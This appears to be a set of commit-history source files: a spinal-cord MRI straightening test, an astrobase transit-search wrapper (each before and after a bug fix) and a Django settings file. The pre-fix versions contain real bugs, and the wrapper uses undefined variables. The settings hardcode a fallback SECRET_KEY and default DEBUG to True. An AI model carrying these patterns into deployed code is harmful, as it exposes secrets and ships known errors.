pc = 1000 * (10 ** (0.2 * mag)) / fakemag * u.parsec
pc_err = (fakemag_err / fakemag) * pc.value * u.parsec
return pc, pc_err
|
#!/usr/bin/env python
#########################################################################################
#
# Test function for sct_sctraighten_spinalcord script
#
# replace the shell test script in sct 1.0
#
# ---------------------------------------------------------------------------------------
# Copyright (c) 2014 Polytechnique Montreal <www.neuro.polymtl.ca>
# Author: Augustin Roux
# modified: 2014/09/28
#
# About the license: see the file LICENSE.TXT
#########################################################################################
import sct_utils as sct
from msct_parser import Parser
import sct_straighten_spinalcord
from pandas import DataFrame
import os.path
def test(path_data='', parameters=''):
if not parameters:
parameters = '-i t2/t2.nii.gz -s t2/t2_seg.nii.gz -qc 0'
parser = sct_straighten_spinalcord.get_parser()
dict_param = parser.parse(parameters.split(), check_file_exist=False)
dict_param_with_path = parser.add_path_to_file(dict_param, path_data, input_file=True)
param_with_path = parser.dictionary_to_string(dict_param_with_path)
# Check if input files exist
if not (os.path.isfile(dict_param_with_path['-i']) and os.path.isfile(dict_param_with_path['-s'])):
status = 200
output = 'ERROR: the file(s) provided to test function do not exist in folder: ' + path_data
return status, output, DataFrame(data={'status': status, 'output': output, 'mse': float('nan'), 'dist_max': float('nan')}, index=[path_data])
# create output folder to deal with multithreading (i.e., we don't want to have outputs from several subjects in the current directory)
import time, random
subject_folder = path_data.split('/')
if subject_folder[-1] == '' and len(subject_folder) > 1:
subject_folder = subject_folder[-2]
else:
subject_folder = subject_folder[-1]
path_output = sct.slash_at_the_end('sct_straighten_spinalcord_' + subject_folder + '_' + time.strftime("%y%m%d%H%M%S") + '_'+str(random.randint(1, 1000000)), slash=1)
param_with_path += ' -ofolder ' + path_output
# run command
cmd = 'sct_straighten_spinalcord ' + param_with_path
output = '\n====================================================================================================\n'+cmd+'\n====================================================================================================\n\n' # copy command
time_start = time.time()
status, o = sct.run(cmd, 0)
output += o
duration = time.time() - time_start
# initialization of results: must be NaN if test fails
result_mse, result_dist_max = float('nan'), float('nan')
if status == 0:
# extraction of results
output_split = output.split('Maximum x-y error = ')[1].split(' mm')
result_dist_max = float(output_split[0])
result_mse = float(output_split[1].split('Accuracy of straightening (MSE) = ')[1])
# integrity testing
th_result_dist_max = 4.0
if result_dist_max > th_result_dist_max:
status = 99
output += '\nWARNING: Maximum x-y error = '+str(result_dist_max)+' < '+str(th_result_dist_max)
th_result_mse = 1.5
if result_mse > th_result_mse:
status = 99
output += '\nWARNING: RMSE = '+str(result_mse)+' < '+str(th_result_mse)
# apply curved2straight, then straight2curve, then compared results
path_input, file_input, ext_input = sct.extract_fname(dict_param_with_path['-i'])
sct.run('sct_apply_transfo -i '+dict_param_with_path['-s']+' -d '+path_output+file_input+'_straight'+ext_input+' -w '+path_output+'warp_curve2straight.nii.gz -o '+path_output+'tmp_seg_straight.nii.gz -x linear', 0)
sct.run('sct_apply_transfo -i '+path_output+'tmp_seg_straight.nii.gz -d '+dict_param_with_path['-s']+' -w '+path_output+'warp_straight2curve.nii.gz -o '+path_output+'tmp_seg_straight_curved.nii.gz -x nn', 0)
# threshold and binarize
sct.run('sct_maths -i '+path_output+'tmp_seg_straight_curved.nii.gz -thr 0.5 -o '+path_output+'tmp_seg_straight_curved.nii.gz', 0)
sct.run('sct_maths -i '+path_output+'tmp_seg_straight_curved.nii.gz -bin -o '+path_output+'tmp_seg_straight_curved.nii.gz', 0)
# compute DICE
cmd = 'sct_dice_coefficient -i '+path_output+'tmp_seg_straight_curved.nii.gz -d ' + dict_param_with_path['-c']
status2, output2 = sct.run(cmd, 0)
# parse output and compare to acceptable threshold
result_dice = float(output2.split('3D Dice coefficient = ')[1].split('\n')[0])
th_dice = 0.95
if result_dice < th_dice:
status = 99
output += '\nWARNING: DICE = '+str(result_dice)+' < '+str(th_dice)
# transform results into Pandas structure
results = DataFrame(data={'status': status, 'output': output, 'mse': result_mse, 'dist_max': result_dist_max, 'dice': result_dice, 'duration': duration}, index=[path_data])
return status, output, results
if __name__ == "__main__":
# call main function
test()
REF test using new flags
Former-commit-id: d9cf8fc0dba907f28f75938692cfb09e9787925b
Former-commit-id: d0352fdbc0ea4d2f14f1e2e97ae4b1d56e6d853c
#!/usr/bin/env python
#########################################################################################
#
# Test function for sct_sctraighten_spinalcord script
#
# replace the shell test script in sct 1.0
#
# ---------------------------------------------------------------------------------------
# Copyright (c) 2014 Polytechnique Montreal <www.neuro.polymtl.ca>
# Author: Augustin Roux
# modified: 2014/09/28
#
# About the license: see the file LICENSE.TXT
#########################################################################################
import sct_utils as sct
from msct_parser import Parser
import sct_straighten_spinalcord
from pandas import DataFrame
import os.path
def test(path_data='', parameters=''):
if not parameters:
parameters = '-i t2/t2.nii.gz -s t2/t2_seg.nii.gz -qc 0'
parser = sct_straighten_spinalcord.get_parser()
dict_param = parser.parse(parameters.split(), check_file_exist=False)
dict_param_with_path = parser.add_path_to_file(dict_param, path_data, input_file=True)
param_with_path = parser.dictionary_to_string(dict_param_with_path)
# Check if input files exist
if not (os.path.isfile(dict_param_with_path['-i']) and os.path.isfile(dict_param_with_path['-s'])):
status = 200
output = 'ERROR: the file(s) provided to test function do not exist in folder: ' + path_data
return status, output, DataFrame(data={'status': status, 'output': output, 'mse': float('nan'), 'dist_max': float('nan')}, index=[path_data])
# create output folder to deal with multithreading (i.e., we don't want to have outputs from several subjects in the current directory)
import time, random
subject_folder = path_data.split('/')
if subject_folder[-1] == '' and len(subject_folder) > 1:
subject_folder = subject_folder[-2]
else:
subject_folder = subject_folder[-1]
path_output = sct.slash_at_the_end('sct_straighten_spinalcord_' + subject_folder + '_' + time.strftime("%y%m%d%H%M%S") + '_'+str(random.randint(1, 1000000)), slash=1)
param_with_path += ' -ofolder ' + path_output
# run command
cmd = 'sct_straighten_spinalcord ' + param_with_path
output = '\n====================================================================================================\n'+cmd+'\n====================================================================================================\n\n' # copy command
time_start = time.time()
status, o = sct.run(cmd, 0)
output += o
duration = time.time() - time_start
# initialization of results: must be NaN if test fails
result_mse, result_dist_max = float('nan'), float('nan')
if status == 0:
# extraction of results
output_split = output.split('Maximum x-y error = ')[1].split(' mm')
result_dist_max = float(output_split[0])
result_mse = float(output_split[1].split('Accuracy of straightening (MSE) = ')[1])
# integrity testing
th_result_dist_max = 4.0
if result_dist_max > th_result_dist_max:
status = 99
output += '\nWARNING: Maximum x-y error = '+str(result_dist_max)+' < '+str(th_result_dist_max)
th_result_mse = 1.5
if result_mse > th_result_mse:
status = 99
output += '\nWARNING: RMSE = '+str(result_mse)+' < '+str(th_result_mse)
# apply curved2straight, then straight2curve, then compared results
path_input, file_input, ext_input = sct.extract_fname(dict_param_with_path['-i'])
sct.run('sct_apply_transfo -i '+dict_param_with_path['-s']+' -d '+path_output+file_input+'_straight'+ext_input+' -w '+path_output+'warp_curve2straight.nii.gz -o '+path_output+'tmp_seg_straight.nii.gz -x linear', 0)
sct.run('sct_apply_transfo -i '+path_output+'tmp_seg_straight.nii.gz -d '+dict_param_with_path['-s']+' -w '+path_output+'warp_straight2curve.nii.gz -o '+path_output+'tmp_seg_straight_curved.nii.gz -x nn', 0)
# threshold and binarize
sct.run('sct_maths -i '+path_output+'tmp_seg_straight_curved.nii.gz -thr 0.5 -o '+path_output+'tmp_seg_straight_curved.nii.gz', 0)
sct.run('sct_maths -i '+path_output+'tmp_seg_straight_curved.nii.gz -bin -o '+path_output+'tmp_seg_straight_curved.nii.gz', 0)
# compute DICE
cmd = 'sct_dice_coefficient -i '+path_output+'tmp_seg_straight_curved.nii.gz -d ' + dict_param_with_path['-s']
status2, output2 = sct.run(cmd, 0)
# parse output and compare to acceptable threshold
result_dice = float(output2.split('3D Dice coefficient = ')[1].split('\n')[0])
th_dice = 0.95
if result_dice < th_dice:
status = 99
output += '\nWARNING: DICE = '+str(result_dice)+' < '+str(th_dice)
# transform results into Pandas structure
results = DataFrame(data={'status': status, 'output': output, 'mse': result_mse, 'dist_max': result_dist_max, 'dice': result_dice, 'duration': duration}, index=[path_data])
return status, output, results
if __name__ == "__main__":
# call main function
test() |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# tls.py - Luke Bouma (luke@astro.princeton.edu) - Apr 2019
"""
Contains the Hippke & Heller (2019) transit-least-squared period-search
algorithm implementation for periodbase. This depends on the external package
written by Hippke & Heller, https://github.com/hippke/tls.
"""
#############
## LOGGING ##
#############
import logging
from astrobase import log_sub, log_fmt, log_date_fmt
DEBUG = False
if DEBUG:
level = logging.DEBUG
else:
level = logging.INFO
LOGGER = logging.getLogger(__name__)
logging.basicConfig(
level=level,
style=log_sub,
format=log_fmt,
datefmt=log_date_fmt,
)
LOGDEBUG = LOGGER.debug
LOGINFO = LOGGER.info
LOGWARNING = LOGGER.warning
LOGERROR = LOGGER.error
LOGEXCEPTION = LOGGER.exception
#############
## IMPORTS ##
#############
import numpy as np
from multiprocessing import Pool, cpu_count
from math import fmod
from numpy import (
nan as npnan, arange as nparange, array as nparray,
isfinite as npisfinite, argmax as npargmax, linspace as nplinspace,
ceil as npceil, argsort as npargsort, concatenate as npconcatenate
)
from astropy import units as u
try:
from transitleastsquares import transitleastsquares
except:
errmsg = (
'tried importing transitleastsquares and failed.\n'
'are you sure you have installed it correctly?\n'
'see https://transitleastsquares.readthedocs.io/en/latest/Installation.html'
)
raise ImportError(errmsg)
###################
## LOCAL IMPORTS ##
###################
from ..lcmath import sigclip_magseries
############
## CONFIG ##
############
NCPUS = cpu_count()
#######################
## UTILITY FUNCTIONS ##
#######################
def tls_parallel_pfind(times, mags, errs,
magsarefluxes=None,
startp=0.1, # search from 0.1 d to...
endp=None, # determine automatically from times
tlsoversample=5,
tlsmintransits=3,
tls_transit_template='default',
tls_R_star_min=0.13,
tls_R_star_max=3.5,
tls_M_star_min=0.1,
tls_M_star_max=2.0,
periodepsilon=0.1,
nbestpeaks=5,
sigclip=10.0,
verbose=True,
nworkers=None):
"""
Wrapper to Hippke & Heller (2019)'s "transit least squares", which is BLS,
but with a slightly better template (and niceties in the implementation).
A few comments:
* The time series must be in units of days.
* The frequency sampling Hippke & Heller (2019) advocate for is cubic in
frequencies, instead of linear. Ofir (2014) found that the
linear-in-frequency sampling (which is correct for sinusoidal signal
detection) isn't optimal for a Keplerian box signal. He gave an equation
for "optimal" sampling. `tlsoversample` is the factor by which to
oversample over that. The grid can be imported independently via::
from transitleastsquares import period_grid
The spacing equations are given here:
https://transitleastsquares.readthedocs.io/en/latest/Python%20interface.html#period-grid
* The boundaries of the period search are by default 0.1 day to 99% the
baseline of times.
Parameters
----------
times,mags,errs : np.array
The magnitude/flux time-series to search for transits.
magsarefluxes : bool
`transitleastsquares` requires fluxes. Therefore if magsarefluxes is
set to false, the passed mags are converted to fluxes. All output
dictionary vectors include fluxes, not mags.
startp,endp : float
The minimum and maximum periods to consider for the transit search.
tlsoversample : int
Factor by which to oversample the frequency grid.
tlsmintransits : int
Sets the `min_n_transits` kwarg for the `BoxLeastSquares.autoperiod()`
function.
tls_transit_template: str
`default`, `grazing`, or `box`.
tls_R_star_min, tls_R_star_max, tls_M_star_min, tls_M_star_max : float
The range of stellar values used to create the frequency grid.
periodepsilon : float
The fractional difference between successive values of 'best' periods
when sorting by periodogram power to consider them as separate periods
(as opposed to part of the same periodogram peak). This is used to avoid
broad peaks in the periodogram and make sure the 'best' periods returned
are all actually independent.
nbestpeaks : int
The number of 'best' peaks to return from the periodogram results,
starting from the global maximum of the periodogram peak values.
sigclip : float or int or sequence of two floats/ints or None
If a single float or int, a symmetric sigma-clip will be performed using
the number provided as the sigma-multiplier to cut out from the input
time-series.
If a list of two ints/floats is provided, the function will perform an
'asymmetric' sigma-clip. The first element in this list is the sigma
value to use for fainter flux/mag values; the second element in this
list is the sigma value to use for brighter flux/mag values. For
example, `sigclip=[10., 3.]`, will sigclip out greater than 10-sigma
dimmings and greater than 3-sigma brightenings. Here the meaning of
"dimming" and "brightening" is set by *physics* (not the magnitude
system), which is why the `magsarefluxes` kwarg must be correctly set.
If `sigclip` is None, no sigma-clipping will be performed, and the
time-series (with non-finite elems removed) will be passed through to
the output.
verbose : bool
Kept for consistency with `periodbase` functions.
nworkers : int or None
The number of parallel workers to launch for period-search. If None,
nworkers = NCPUS.
Returns
-------
dict
This function returns a dict, referred to as an `lspinfo` dict in other
astrobase functions that operate on periodogram results. The format is
similar to the other astrobase period-finders -- it contains the
nbestpeaks, which is the most important thing. (But isn't entirely
standardized.)
Crucially, it also contains "tlsresult", which is a dictionary with
transitleastsquares spectra (used to get the SDE as defined in the TLS
paper), statistics, transit period, mid-time, duration, depth, SNR, and
the "odd_even_mismatch" statistic. The full key list is::
dict_keys(['SDE', 'SDE_raw', 'chi2_min', 'chi2red_min', 'period',
'period_uncertainty', 'T0', 'duration', 'depth', 'depth_mean',
'depth_mean_even', 'depth_mean_odd', 'transit_depths',
'transit_depths_uncertainties', 'rp_rs', 'snr', 'snr_per_transit',
'snr_pink_per_transit', 'odd_even_mismatch', 'transit_times',
'per_transit_count', 'transit_count', 'distinct_transit_count',
'empty_transit_count', 'FAP', 'in_transit_count', 'after_transit_count',
'before_transit_count', 'periods', 'power', 'power_raw', 'SR', 'chi2',
'chi2red', 'model_lightcurve_time', 'model_lightcurve_model',
'model_folded_phase', 'folded_y', 'folded_dy', 'folded_phase',
'model_folded_model'])
The descriptions are here::
https://transitleastsquares.readthedocs.io/en/latest/Python%20interface.html#return-values
The remaining resultdict is::
resultdict = {
'tlsresult':tlsresult,
'bestperiod': the best period value in the periodogram,
'bestlspval': the periodogram peak associated with the best period,
'nbestpeaks': the input value of nbestpeaks,
'nbestlspvals': nbestpeaks-size list of best period peak values,
'nbestperiods': nbestpeaks-size list of best periods,
'lspvals': the full array of periodogram powers,
'periods': the full array of periods considered,
'tlsresult': Astropy tls result object (BoxLeastSquaresResult),
'tlsmodel': Astropy tls BoxLeastSquares object used for work,
'method':'tls' -> the name of the period-finder method,
'kwargs':{ dict of all of the input kwargs for record-keeping}
}
"""
if not magsarefluxes:
LOGWARNING('transitleastsquares requires relative flux...')
LOGWARNING('converting input mags to relative flux...')
LOGWARNING('and forcing magsarefluxes=True...')
mag_0, f_0 = 12, 1e4
flux = f_0 * 10**( -0.4 * (mag - mag_0) )
flux /= np.nanmedian(flux)
mags = flux
magsarefluxes = True
if nworkers is None:
nworkers = NCPUS
if errs is None:
# uniform weights
errs = np.ones_like(flux)*1e-4
# get rid of nans first and sigclip
stimes, smags, serrs = sigclip_magseries(times, mags, errs,
magsarefluxes=magsarefluxes,
sigclip=sigclip)
# make sure there are enough points to calculate a spectrum
if not (len(stimes) > 9 and len(smags) > 9 and len(serrs) > 9):
LOGERROR('no good detections for these times and mags, skipping...')
resultdict = {
'tlsresult':npnan,
'bestperiod':npnan,
'bestlspval':npnan,
'nbestpeaks':nbestpeaks,
'nbestinds':None,
'nbestlspvals':None,
'nbestperiods':None,
'lspvals':None,
'periods':None,
'method':'tls',
'kwargs':{'startp':startp,
'endp':endp,
'tlsoversample':tlsoversample,
'tlsntransits':tlsmintransits,
'periodepsilon':periodepsilon,
'nbestpeaks':nbestpeaks,
'sigclip':sigclip,
'magsarefluxes':magsarefluxes}
}
return resultdict
if endp is None:
# out to 99% of the baseline. (for two transits).
endp = 0.99*(np.nanmax(stimes) - np.nanmin(stimes))
# run periodogram
model = transitleastsquares(stimes, smags, serrs)
tlsresult = model.power(use_threads=nworkers, show_progress_bar=False,
R_star_min=tls_R_star_min,
R_star_max=tls_R_star_min,
M_star_min=tls_M_star_min,
M_star_max=tls_M_star_max,
period_min=startp, period_max=endp,
n_transits_min=tlsmintransits,
transit_template=tls_transit_template,
oversampling_factor=tlsoversample)
# get the peak values
lsp = nparray(tlsresult.power)
periods = nparray(tlsresult.periods)
# find the nbestpeaks for the periodogram: 1. sort the lsp array by highest
# value first 2. go down the values until we find five values that are
# separated by at least periodepsilon in period make sure to get only the
# finite peaks in the periodogram this is needed because tls may produce
# infs for some peaks
finitepeakind = npisfinite(lsp)
finlsp = lsp[finitepeakind]
finperiods = periods[finitepeakind]
# make sure that finlsp has finite values before we work on it
try:
bestperiodind = npargmax(finlsp)
except ValueError:
LOGERROR('no finite periodogram values '
'for this mag series, skipping...')
resultdict = {
'tlsresult':npnan,
'bestperiod':npnan,
'bestlspval':npnan,
'nbestpeaks':nbestpeaks,
'nbestinds':None,
'nbestlspvals':None,
'nbestperiods':None,
'lspvals':None,
'periods':None,
'method':'tls',
'kwargs':{'startp':startp,
'endp':endp,
'tlsoversample':tlsoversample,
'tlsntransits':tlsmintransits,
'periodepsilon':periodepsilon,
'nbestpeaks':nbestpeaks,
'sigclip':sigclip,
'magsarefluxes':magsarefluxes}
}
return resultdict
sortedlspind = npargsort(finlsp)[::-1]
sortedlspperiods = finperiods[sortedlspind]
sortedlspvals = finlsp[sortedlspind]
# now get the nbestpeaks
nbestperiods, nbestlspvals, nbestinds, peakcount = (
[finperiods[bestperiodind]],
[finlsp[bestperiodind]],
[bestperiodind],
1
)
prevperiod = sortedlspperiods[0]
# find the best nbestpeaks in the lsp and their periods
for period, lspval, ind in zip(sortedlspperiods,
sortedlspvals,
sortedlspind):
if peakcount == nbestpeaks:
break
perioddiff = abs(period - prevperiod)
bestperiodsdiff = [abs(period - x) for x in nbestperiods]
# this ensures that this period is different from the last
# period and from all the other existing best periods by
# periodepsilon to make sure we jump to an entire different
# peak in the periodogram
if (perioddiff > (periodepsilon*prevperiod) and
all(x > (periodepsilon*period)
for x in bestperiodsdiff)):
nbestperiods.append(period)
nbestlspvals.append(lspval)
nbestinds.append(ind)
peakcount = peakcount + 1
prevperiod = period
# generate the return dict
resultdict = {
'tlsresult':tlsresult,
'bestperiod':finperiods[bestperiodind],
'bestlspval':finlsp[bestperiodind],
'nbestpeaks':nbestpeaks,
'nbestinds':nbestinds,
'nbestlspvals':nbestlspvals,
'nbestperiods':nbestperiods,
'lspvals':lsp,
'periods':periods,
'method':'tls',
'kwargs':{'startp':startp,
'endp':endp,
'tlsoversample':tlsoversample,
'tlsntransits':tlsmintransits,
'periodepsilon':periodepsilon,
'nbestpeaks':nbestpeaks,
'sigclip':sigclip,
'magsarefluxes':magsarefluxes}
}
return resultdict
fix bug
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# tls.py - Luke Bouma (luke@astro.princeton.edu) - Apr 2019
"""
Contains the Hippke & Heller (2019) transit-least-squared period-search
algorithm implementation for periodbase. This depends on the external package
written by Hippke & Heller, https://github.com/hippke/tls.
"""
#############
## LOGGING ##
#############
import logging
from astrobase import log_sub, log_fmt, log_date_fmt
DEBUG = False
if DEBUG:
level = logging.DEBUG
else:
level = logging.INFO
LOGGER = logging.getLogger(__name__)
logging.basicConfig(
level=level,
style=log_sub,
format=log_fmt,
datefmt=log_date_fmt,
)
LOGDEBUG = LOGGER.debug
LOGINFO = LOGGER.info
LOGWARNING = LOGGER.warning
LOGERROR = LOGGER.error
LOGEXCEPTION = LOGGER.exception
#############
## IMPORTS ##
#############
import numpy as np
from multiprocessing import Pool, cpu_count
from math import fmod
from numpy import (
nan as npnan, arange as nparange, array as nparray,
isfinite as npisfinite, argmax as npargmax, linspace as nplinspace,
ceil as npceil, argsort as npargsort, concatenate as npconcatenate
)
from astropy import units as u
try:
from transitleastsquares import transitleastsquares
except:
errmsg = (
'tried importing transitleastsquares and failed.\n'
'are you sure you have installed it correctly?\n'
'see https://transitleastsquares.readthedocs.io/en/latest/Installation.html'
)
raise ImportError(errmsg)
###################
## LOCAL IMPORTS ##
###################
from ..lcmath import sigclip_magseries
############
## CONFIG ##
############
NCPUS = cpu_count()
#######################
## UTILITY FUNCTIONS ##
#######################
def tls_parallel_pfind(times, mags, errs,
magsarefluxes=None,
startp=0.1, # search from 0.1 d to...
endp=None, # determine automatically from times
tlsoversample=5,
tlsmintransits=3,
tls_transit_template='default',
tls_R_star_min=0.13,
tls_R_star_max=3.5,
tls_M_star_min=0.1,
tls_M_star_max=2.0,
periodepsilon=0.1,
nbestpeaks=5,
sigclip=10.0,
verbose=True,
nworkers=None):
"""
Wrapper to Hippke & Heller (2019)'s "transit least squares", which is BLS,
but with a slightly better template (and niceties in the implementation).
A few comments:
* The time series must be in units of days.
* The frequency sampling Hippke & Heller (2019) advocate for is cubic in
frequencies, instead of linear. Ofir (2014) found that the
linear-in-frequency sampling (which is correct for sinusoidal signal
detection) isn't optimal for a Keplerian box signal. He gave an equation
for "optimal" sampling. `tlsoversample` is the factor by which to
oversample over that. The grid can be imported independently via::
from transitleastsquares import period_grid
The spacing equations are given here:
https://transitleastsquares.readthedocs.io/en/latest/Python%20interface.html#period-grid
* The boundaries of the period search are by default 0.1 day to 99% the
baseline of times.
Parameters
----------
times,mags,errs : np.array
The magnitude/flux time-series to search for transits.
magsarefluxes : bool
`transitleastsquares` requires fluxes. Therefore if magsarefluxes is
set to false, the passed mags are converted to fluxes. All output
dictionary vectors include fluxes, not mags.
startp,endp : float
The minimum and maximum periods to consider for the transit search.
tlsoversample : int
Factor by which to oversample the frequency grid.
tlsmintransits : int
Sets the `min_n_transits` kwarg for the `BoxLeastSquares.autoperiod()`
function.
tls_transit_template: str
`default`, `grazing`, or `box`.
tls_R_star_min, tls_R_star_max, tls_M_star_min, tls_M_star_max : float
The range of stellar values used to create the frequency grid.
periodepsilon : float
The fractional difference between successive values of 'best' periods
when sorting by periodogram power to consider them as separate periods
(as opposed to part of the same periodogram peak). This is used to avoid
broad peaks in the periodogram and make sure the 'best' periods returned
are all actually independent.
nbestpeaks : int
The number of 'best' peaks to return from the periodogram results,
starting from the global maximum of the periodogram peak values.
sigclip : float or int or sequence of two floats/ints or None
If a single float or int, a symmetric sigma-clip will be performed using
the number provided as the sigma-multiplier to cut out from the input
time-series.
If a list of two ints/floats is provided, the function will perform an
'asymmetric' sigma-clip. The first element in this list is the sigma
value to use for fainter flux/mag values; the second element in this
list is the sigma value to use for brighter flux/mag values. For
example, `sigclip=[10., 3.]`, will sigclip out greater than 10-sigma
dimmings and greater than 3-sigma brightenings. Here the meaning of
"dimming" and "brightening" is set by *physics* (not the magnitude
system), which is why the `magsarefluxes` kwarg must be correctly set.
If `sigclip` is None, no sigma-clipping will be performed, and the
time-series (with non-finite elems removed) will be passed through to
the output.
verbose : bool
Kept for consistency with `periodbase` functions.
nworkers : int or None
The number of parallel workers to launch for period-search. If None,
nworkers = NCPUS.
Returns
-------
dict
This function returns a dict, referred to as an `lspinfo` dict in other
astrobase functions that operate on periodogram results. The format is
similar to the other astrobase period-finders -- it contains the
nbestpeaks, which is the most important thing. (But isn't entirely
standardized.)
Crucially, it also contains "tlsresult", which is a dictionary with
transitleastsquares spectra (used to get the SDE as defined in the TLS
paper), statistics, transit period, mid-time, duration, depth, SNR, and
the "odd_even_mismatch" statistic. The full key list is::
dict_keys(['SDE', 'SDE_raw', 'chi2_min', 'chi2red_min', 'period',
'period_uncertainty', 'T0', 'duration', 'depth', 'depth_mean',
'depth_mean_even', 'depth_mean_odd', 'transit_depths',
'transit_depths_uncertainties', 'rp_rs', 'snr', 'snr_per_transit',
'snr_pink_per_transit', 'odd_even_mismatch', 'transit_times',
'per_transit_count', 'transit_count', 'distinct_transit_count',
'empty_transit_count', 'FAP', 'in_transit_count', 'after_transit_count',
'before_transit_count', 'periods', 'power', 'power_raw', 'SR', 'chi2',
'chi2red', 'model_lightcurve_time', 'model_lightcurve_model',
'model_folded_phase', 'folded_y', 'folded_dy', 'folded_phase',
'model_folded_model'])
The descriptions are here::
https://transitleastsquares.readthedocs.io/en/latest/Python%20interface.html#return-values
The remaining resultdict is::
resultdict = {
'tlsresult':tlsresult,
'bestperiod': the best period value in the periodogram,
'bestlspval': the periodogram peak associated with the best period,
'nbestpeaks': the input value of nbestpeaks,
'nbestlspvals': nbestpeaks-size list of best period peak values,
'nbestperiods': nbestpeaks-size list of best periods,
'lspvals': the full array of periodogram powers,
'periods': the full array of periods considered,
'tlsresult': Astropy tls result object (BoxLeastSquaresResult),
'tlsmodel': Astropy tls BoxLeastSquares object used for work,
'method':'tls' -> the name of the period-finder method,
'kwargs':{ dict of all of the input kwargs for record-keeping}
}
"""
if not magsarefluxes:
LOGWARNING('transitleastsquares requires relative flux...')
LOGWARNING('converting input mags to relative flux...')
LOGWARNING('and forcing magsarefluxes=True...')
mag_0, f_0 = 12, 1e4
flux = f_0 * 10**( -0.4 * (mag - mag_0) )
flux /= np.nanmedian(flux)
mags = flux
magsarefluxes = True
if nworkers is None:
nworkers = NCPUS
if errs is None:
# uniform weights
errs = np.ones_like(flux)*1e-4
# get rid of nans first and sigclip
stimes, smags, serrs = sigclip_magseries(times, mags, errs,
magsarefluxes=magsarefluxes,
sigclip=sigclip)
# make sure there are enough points to calculate a spectrum
if not (len(stimes) > 9 and len(smags) > 9 and len(serrs) > 9):
LOGERROR('no good detections for these times and mags, skipping...')
resultdict = {
'tlsresult':npnan,
'bestperiod':npnan,
'bestlspval':npnan,
'nbestpeaks':nbestpeaks,
'nbestinds':None,
'nbestlspvals':None,
'nbestperiods':None,
'lspvals':None,
'periods':None,
'method':'tls',
'kwargs':{'startp':startp,
'endp':endp,
'tlsoversample':tlsoversample,
'tlsntransits':tlsmintransits,
'periodepsilon':periodepsilon,
'nbestpeaks':nbestpeaks,
'sigclip':sigclip,
'magsarefluxes':magsarefluxes}
}
return resultdict
if endp is None:
# out to 99% of the baseline. (for two transits).
endp = 0.99*(np.nanmax(stimes) - np.nanmin(stimes))
# run periodogram
model = transitleastsquares(stimes, smags, serrs)
tlsresult = model.power(use_threads=nworkers, show_progress_bar=False,
R_star_min=tls_R_star_min,
R_star_max=tls_R_star_max,
M_star_min=tls_M_star_min,
M_star_max=tls_M_star_max,
period_min=startp, period_max=endp,
n_transits_min=tlsmintransits,
transit_template=tls_transit_template,
oversampling_factor=tlsoversample)
# get the peak values
lsp = nparray(tlsresult.power)
periods = nparray(tlsresult.periods)
# find the nbestpeaks for the periodogram: 1. sort the lsp array by highest
# value first 2. go down the values until we find five values that are
# separated by at least periodepsilon in period make sure to get only the
# finite peaks in the periodogram this is needed because tls may produce
# infs for some peaks
finitepeakind = npisfinite(lsp)
finlsp = lsp[finitepeakind]
finperiods = periods[finitepeakind]
# make sure that finlsp has finite values before we work on it
try:
bestperiodind = npargmax(finlsp)
except ValueError:
LOGERROR('no finite periodogram values '
'for this mag series, skipping...')
resultdict = {
'tlsresult':npnan,
'bestperiod':npnan,
'bestlspval':npnan,
'nbestpeaks':nbestpeaks,
'nbestinds':None,
'nbestlspvals':None,
'nbestperiods':None,
'lspvals':None,
'periods':None,
'method':'tls',
'kwargs':{'startp':startp,
'endp':endp,
'tlsoversample':tlsoversample,
'tlsntransits':tlsmintransits,
'periodepsilon':periodepsilon,
'nbestpeaks':nbestpeaks,
'sigclip':sigclip,
'magsarefluxes':magsarefluxes}
}
return resultdict
sortedlspind = npargsort(finlsp)[::-1]
sortedlspperiods = finperiods[sortedlspind]
sortedlspvals = finlsp[sortedlspind]
# now get the nbestpeaks
nbestperiods, nbestlspvals, nbestinds, peakcount = (
[finperiods[bestperiodind]],
[finlsp[bestperiodind]],
[bestperiodind],
1
)
prevperiod = sortedlspperiods[0]
# find the best nbestpeaks in the lsp and their periods
for period, lspval, ind in zip(sortedlspperiods,
sortedlspvals,
sortedlspind):
if peakcount == nbestpeaks:
break
perioddiff = abs(period - prevperiod)
bestperiodsdiff = [abs(period - x) for x in nbestperiods]
# this ensures that this period is different from the last
# period and from all the other existing best periods by
# periodepsilon to make sure we jump to an entire different
# peak in the periodogram
if (perioddiff > (periodepsilon*prevperiod) and
all(x > (periodepsilon*period)
for x in bestperiodsdiff)):
nbestperiods.append(period)
nbestlspvals.append(lspval)
nbestinds.append(ind)
peakcount = peakcount + 1
prevperiod = period
# generate the return dict
resultdict = {
'tlsresult':tlsresult,
'bestperiod':finperiods[bestperiodind],
'bestlspval':finlsp[bestperiodind],
'nbestpeaks':nbestpeaks,
'nbestinds':nbestinds,
'nbestlspvals':nbestlspvals,
'nbestperiods':nbestperiods,
'lspvals':lsp,
'periods':periods,
'method':'tls',
'kwargs':{'startp':startp,
'endp':endp,
'tlsoversample':tlsoversample,
'tlsntransits':tlsmintransits,
'periodepsilon':periodepsilon,
'nbestpeaks':nbestpeaks,
'sigclip':sigclip,
'magsarefluxes':magsarefluxes}
}
return resultdict
|
"""
Django settings for makeabilitylab project.
Generated by 'django-admin startproject' using Django 1.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
from configparser import ConfigParser
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Load a ConfigParser object from a file called config.ini at the base level
# of the django project.
config = ConfigParser()
config.read(os.path.join(BASE_DIR, 'config.ini'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
if config.has_option('Django', 'SECRET_KEY'):
SECRET_KEY = config.get('Django', 'SECRET_KEY')
else:
# We should never be in production with this key
SECRET_KEY = 'pe)-#st8rk!pomy!_1ha7=cpypp_(8%1xqmtw%!u@kw-f5&w^e'
# SECURITY WARNING: don't run with debug turned on in production!
# we will default to True if not overriden in the config file
if config.has_option('Django', 'DEBUG'):
DEBUG = config.getboolean('Django', 'DEBUG')
else:
DEBUG = True
# TODO: Take this out when done debugging production
# DEBUG = True
if config.has_option('Django', 'ALLOWED_HOSTS'):
USE_X_FORWARDED_HOST = True
ALLOWED_HOSTS = config.get('Django', 'ALLOWED_HOSTS').split(',')
else:
ALLOWED_HOSTS = []
